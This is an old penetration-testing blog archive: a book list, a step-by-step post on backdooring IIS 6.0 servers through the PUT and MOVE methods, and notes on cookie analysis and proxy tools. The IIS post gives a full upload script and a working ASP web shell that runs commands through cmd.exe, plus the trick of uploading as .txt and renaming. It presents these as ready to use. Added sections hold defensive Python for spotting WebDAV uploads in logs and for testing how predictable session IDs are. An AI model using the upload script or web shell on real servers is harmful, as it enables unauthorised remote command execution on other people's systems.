Recommended Books For Pentesting

June 30, 2007 Tools for Wep App Testing | Comments (0) sid @ 7:46 pm

Although I don't have the habit of reading books, here are a few books which you may consider reading.

———– 

Database Hacker's Handbook (David Litchfield)

Oracle Hacker's Handbook (David Litchfield)

Hacking Web Applications Exposed (TMH Publications)

Essential PHP Security (Chris Shiflett)

TCP/IP Illustrated (Comer)

Hacking Linux Exposed

——- 

As this list is really small, it is clear that I need to read more books. If you know of any good book related to pentesting (or security in general), please share it with us.

Owning IIS 6.0 When Webserver Supports Put and Move HTTP Methods

June 14, 2007 Tools for Wep App Testing, Research | Comments (1) sid @ 1:11 pm

Credits: ice and ferruh

In IIS 6.0 you can upload backdoor scripts, but you may not be able to execute the default cmd.exe present on the IIS box, so you need to upload your own cmd.exe first and then make your ASP backdoor point to the cmd.exe which you uploaded.

Steps:

1. Upload cmd.exe to the /scripts/ folder: use the script below, published at http://www.eggheadcafe.com/articles/20010829.asp, which will allow you to upload cmd.exe (or any other binary) to the vulnerable server. You may not be able to upload a .exe file, so rename cmd.exe to cmd.txt and then use the MOVE method to copy it back from cmd.txt to cmd.exe. Note that cmd.exe must be copied to the /scripts/ folder of IIS, where you have execute privileges by default.

Here is the upload script: 

<script language=VBSCRIPT>
dim strURL
function sendit( sfileName, sType)
sData = getFileBytes(sfileName, sType)
sfileName= mid(sfileName, InstrRev(sFileName,"\")+1,len(sfileName))
dim xmlhttp
set xmlhttp=createobject("MSXML2.XMLHTTP.3.0")
strURL = "http://victim.com/scripts/" & sFileName
msgbox "URL is: " & strURL
xmlhttp.Open "PUT", strURL, false
xmlhttp.Send sData
show.innerText= "Status: " & xmlhttp.statusText
set xmlhttp=Nothing
End function
sub showresult()
document.write "<CENTER>Take A look!<BR><A href=" & strURL & ">"& strURL & "</a></CENTER>"
end sub

function getFileBytes(flnm, sType)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
if sType="on" then
objStream.Type = 1 ' adTypeBinary
else
objStream.Type = 2 ' adTypeText
objStream.Charset ="ascii"
end if
objStream.Open
objStream.LoadFromFile flnm
if sType="on" then
getFileBytes=objStream.Read
else
getFileBytes= objStream.ReadText
end if
objStream.Close
Set objStream = Nothing
end function
</script>

<TABLE align=center>
<TR><TD><input type=FILE id=filedata ></TD></TR>
<TR><TD><input type=submit onclick="Call sendit( filedata.value, filetype.value)"></TD></TR>
<TR><TD><input type=checkBox id=filetype checked >Type Binary (Uncheck for Type Text)</TD></TR>
<TR><TD><input type=button value = "SHOW IT" onclick ="showresult()"></TD></TR>
</TABLE>
<div id=show align=center></div>

2. Upload the cmd.asp file to the /scripts/ folder: use the same upload script, running locally on your system, to upload cmd.asp from http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html:

<!-- IIS6 VBscript command shell -->
<!-- aramosf@unsec.net http://www.514.es -->
<title>514 aspshell</title>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="cmd" size=45 value="<%= cmd %>">
<input type=submit value="Run">
</FORM>
<%
If (request("cmd") <> "") Then
Response.Write Server.HTMLEncode(server.createobject("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " & request("cmd")).stdout.readall)
End If
%>

You need to make the script point to the cmd.exe you uploaded to the scripts folder. You will need the absolute path, so the line:

Response.Write Server.HTMLEncode(server.createobject("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " & request("cmd")).stdout.readall)

may look something like:

Response.Write Server.HTMLEncode(server.createobject("wscript.shell").exec("C:\Inetpub\Scripts\mycmd.exe /c " & request("cmd")).stdout.readall)

You may not be able to upload the .asp file, so rename it as .txt and use the move method to copy it again as .asp on the server. That's it, job done, your backdoor should work fine now :-)

Questions:
———

1. How do I obtain the absolute path? Add this line to your backdoor:

<%=Server.Mappath("/scripts/")%>

This will give you the full path; make the necessary changes to your backdoor and upload it again.

———

2. What if the scripts directory is not present?

I think the attack will fail, as you won't have execute permissions.

———

3. Is it good practice not to have a /scripts/ folder in the document root?

Think so.

———
Syntax:
———

Example - PUT Method:

>>Request

PUT /foo.txt HTTP/1.1
Host: www.victim.com
Content-Length: 4

test

>>Response

HTTP/1.1 201 Created
Date: Thu, 14 Jun 2007 09:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.victim.com/foo.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

————————

Example - DELETE

>>Request

DELETE /container/ HTTP/1.1
Host: www.foo.bar

>>Response

HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset="utf-8"
Content-Length: xxxx

<?xml version="1.0" encoding="utf-8" ?>
<d:multistatus xmlns:d="DAV:">
  <d:response>
    <d:href>http://www.foo.bar/container/resource3</d:href>
    <d:status>HTTP/1.1 423 Locked</d:status>
  </d:response>
</d:multistatus>

————-

Example - MOVE

>>Request

   MOVE /~fielding/index.html HTTP/1.1
   Host: www.ics.uci.edu
   Destination: http://www.ics.uci.edu/users/f/fielding/index.html

>>Response

   HTTP/1.1 201 Created
   Location: http://www.ics.uci.edu/users/f/fielding/index.html

————

More HTTP methods: http://www.webdav.org/specs/rfc2518.html
————
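As an added, defender-side example (not code from this post, nor from the tools or pages it links), the checks below cover the two artefacts the post leaves behind: the Allow header in a response such as the PUT example above, which tells you which write-capable WebDAV verbs a server advertises, and the IIS W3C extended log, in which successful PUT/MOVE/DELETE/COPY requests and the "PUT as .txt, then MOVE" staging sequence are visible. The log lines, field layout and addresses are constructed; the parser takes its column order from the log's own #Fields: directive, so it is not tied to one layout.

```python
"""Defender-side checks for the WebDAV write-method exposure described above.

Assumes IIS W3C extended logging.  Note that W3C logs do not record the MOVE
Destination header, so the rename target is not visible in the log; the source
path of the MOVE is enough to raise an alert.
"""

# Verbs that create, rename, delete or alter resources on the server.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}


def unsafe_methods_from_allow(allow_value):
    """Return, sorted, the write-capable verbs listed in an Allow header value."""
    verbs = {v.strip().upper() for v in allow_value.split(",") if v.strip()}
    return sorted(verbs & WRITE_METHODS)


def parse_w3c(lines):
    """Parse W3C extended log lines into dicts keyed by the names in #Fields:."""
    fields = None
    records = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields: header
        values = line.split()
        if len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def _succeeded(record):
    """True when sc-status is a 2xx code."""
    try:
        return 200 <= int(record["sc-status"]) < 300
    except ValueError:
        return False


def find_webdav_writes(records):
    """Successful write-verb requests as (timestamp, client, method, uri, status)."""
    hits = []
    for r in records:
        method = r["cs-method"].upper()
        if method in WRITE_METHODS and _succeeded(r):
            hits.append((f'{r["date"]} {r["time"]}', r["c-ip"], method,
                         r["cs-uri-stem"], int(r["sc-status"])))
    return hits


def find_staged_renames(records, staging_suffix=".txt"):
    """A successful PUT of a *.txt followed by a successful MOVE of the same path
    from the same client: a file uploaded under a harmless extension and then
    renamed.  Returns (client, uri) pairs."""
    staged = []
    for i, put in enumerate(records):
        if put["cs-method"].upper() != "PUT" or not _succeeded(put):
            continue
        uri = put["cs-uri-stem"]
        if not uri.lower().endswith(staging_suffix):
            continue
        for later in records[i + 1:]:
            if (later["cs-method"].upper() == "MOVE"
                    and later["c-ip"] == put["c-ip"]
                    and later["cs-uri-stem"] == uri
                    and _succeeded(later)):
                staged.append((put["c-ip"], uri))
                break
    return staged


# Constructed sample log (not real traffic); client addresses are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2007-06-14 09:47:24 10.0.0.5 GET /default.htm - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2007-06-14 09:47:30 10.0.0.5 PUT /scripts/cmd.txt - 80 - 192.0.2.10 Microsoft-WebDAV-MiniRedir 201 0 0
2007-06-14 09:47:41 10.0.0.5 MOVE /scripts/cmd.txt - 80 - 192.0.2.10 Microsoft-WebDAV-MiniRedir 201 0 0
2007-06-14 09:48:02 10.0.0.5 PUT /scripts/shell.txt - 80 - 192.0.2.10 Microsoft-WebDAV-MiniRedir 201 0 0
2007-06-14 09:48:10 10.0.0.5 MOVE /scripts/shell.txt - 80 - 192.0.2.10 Microsoft-WebDAV-MiniRedir 201 0 0
2007-06-14 09:48:30 10.0.0.5 PUT /upload/report.txt - 80 - 198.51.100.7 Mozilla/4.0 403 0 0
2007-06-14 09:48:45 10.0.0.5 PROPFIND /scripts/ - 80 - 192.0.2.10 Microsoft-WebDAV-MiniRedir 207 0 0
"""

# Allow header exactly as it appears in the PUT response shown in the post.
SAMPLE_ALLOW = ("OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, "
                "PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK")

if __name__ == "__main__":
    print("write-capable verbs advertised:", unsafe_methods_from_allow(SAMPLE_ALLOW))
    recs = parse_w3c(SAMPLE_LOG.splitlines())
    for hit in find_webdav_writes(recs):
        print("write verb:", hit)
    for client, uri in find_staged_renames(recs):
        print("staged rename from", client, "of", uri)
```

The denied PUT (403) and the PROPFIND are deliberately left unflagged: the first check is about writes that succeeded, and read-only verbs are the normal background of a WebDAV-enabled site. The staging check keys on the same client and the same URI because that is the only correlation the W3C record allows once the Destination header is missing.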

Cookie Analysis

March 18, 2007 Tools for Wep App Testing | Comments (3) sid @ 10:18 am

WebScarab is perhaps the only tool I can think of for this. I use this tool to figure out whether the session IDs are predictable or not. The ‘visualisation’ feature is just great. Although the interface is not very well designed, and as a new user you will have difficulties operating this tool, once you learn it, it is very handy. Some other great features include the compare feature, which is a bit like the ‘diff’ command in Unix.

Another reason why I like this tool is the inbuilt fuzzing module. Just specify the parameter in the request which you want to fuzz and point to the file containing the values which you would like the parameter to take. Then use the ‘compare’ section to compare the different responses, and this should indicate whether the fuzzing was successful or not. Although it also has a built-in proxy feature, I still prefer Burp for the proxy, maybe because of the better GUI.

For basic cookie analysis I use a Firefox plugin. This plugin allows you to view all the cookies for a particular domain currently set in your browser, and also allows you to edit them.
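As an added example (not WebScarab's code, nor the post's), here are two simple checks of the kind the post uses WebScarab's visualisation for: a per-position entropy score across a set of captured session IDs, and a test for a counter-like sequence when the IDs are read as hex integers. The sample identifiers are constructed; the code assumes fixed-width hexadecimal IDs collected in the order the server issued them.

```python
"""Two quick predictability checks for sampled session identifiers.

Assumes the identifiers are hexadecimal strings of one fixed length, collected
in issue order.  The entropy score is relative to the sample size and is meant
for ranking candidates, not as an absolute measure of the generator.
"""
import math
from collections import Counter


def positional_entropy_bits(ids):
    """Sum of per-position Shannon entropies over the sample.

    A position whose characters are identical contributes 0 bits; one whose
    characters are all different contributes log2(len(ids)).  The total is
    therefore bounded by len(ids[0]) * log2(len(ids))."""
    if not ids:
        return 0.0
    width = len(ids[0])
    if any(len(s) != width for s in ids):
        raise ValueError("session ids must share one length")
    n = len(ids)
    total = 0.0
    for pos in range(width):
        counts = Counter(s[pos] for s in ids)
        total -= sum((c / n) * math.log2(c / n) for c in counts.values())
    return total


def looks_sequential(ids, max_step=16):
    """True when each id, read as a hex integer, exceeds the previous one by at
    most max_step: a plain counter, or a counter with a small stride."""
    values = [int(s, 16) for s in ids]
    steps = [b - a for a, b in zip(values, values[1:])]
    return bool(steps) and all(0 < d <= max_step for d in steps)


def assess(ids):
    """Summarise both checks for a report."""
    return {
        "samples": len(ids),
        "entropy_bits": round(positional_entropy_bits(ids), 2),
        "max_possible_bits": round(len(ids[0]) * math.log2(len(ids)), 2),
        "sequential": looks_sequential(ids),
    }


# Constructed samples (not from any real application).
SEQUENTIAL_IDS = [f"5a3f1c0000000f1{i:x}" for i in range(8)]  # counter in the low nibble
RANDOM_LOOKING_IDS = [
    "8f3a2c7e1b9d4056", "c41e97a0d2f6b83e", "07d5b3f9a68c12e4", "e9a0163c5bf7d28a",
    "3b6fd4e81a29c705", "a2c80e5f73d1b496", "5de13b7c0f8a9e62", "f76c29a4e3d05b1f",
]

if __name__ == "__main__":
    for name, sample in (("counter", SEQUENTIAL_IDS), ("random-looking", RANDOM_LOOKING_IDS)):
        print(name, assess(sample))
```

With eight samples the ceiling is 16 × log2(8) = 48 bits; the counter scores exactly 3 bits (all of it in the last character) and is flagged sequential, while the random-looking set scores close to the ceiling. A real assessment needs far more samples than eight, and a low score from a small capture is only a prompt to collect more, not a verdict.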

Man In The Middle Tools

This weekend, as I have nothing better to do, lemme talk about my experiences with proxy tools:

  1. Proxy Tool: Parameter manipulation is a very important stage of web app testing, and without it the test will be incomplete. I was using tools like Paros and Achilles for achieving this, but the problem with both of them was that they were highly unstable and would crash every now and then. Thus, if the customer has asked you to provide all the logs of testing, it would be difficult for you to provide them if the tools were to crash. I currently use Burp Suite. I find it highly stable, and it comes with the feature of viewing request/response as text, as parameters, and as hex. Viewing request and response as ‘params’ helps me particularly when dealing with ASP.NET applications, because of the long value of the viewstate and other .NET stuff. Another interesting feature of Burp is the repeater module, which can be used to send modified requests to the server multiple times. I use this feature mostly to figure out the ‘non-essential’ parameters of the unmodified request and then to focus on the essential parameters. The best way to learn the capabilities of this tool is to download it and then play with it. :)